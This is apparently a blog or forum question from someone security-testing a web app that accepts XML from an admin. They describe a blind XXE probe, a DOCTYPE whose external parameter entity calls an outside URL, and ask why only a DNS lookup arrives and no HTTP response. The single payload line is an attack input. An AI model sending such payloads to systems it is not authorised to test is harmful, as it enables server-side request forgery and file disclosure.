I'm testing a web application. it gets xml file from admin. I send following:
<!DOCTYPE foo [<!ENTITY % aaa SYSTEM "http://server.com"> %aaa;]>
it performs a dns lookup (I checked it from log) but it does not get server response. assume the server that runs web app has an IP address: 37.37.37.37. it performs the dns lookup using 37.37.37.240. I think it does not get the response because of CORS but it seems the request fires from another server (probably one that connect to the internet). what do you think about that? (not getting response) thank you
Aucun commentaire:
Enregistrer un commentaire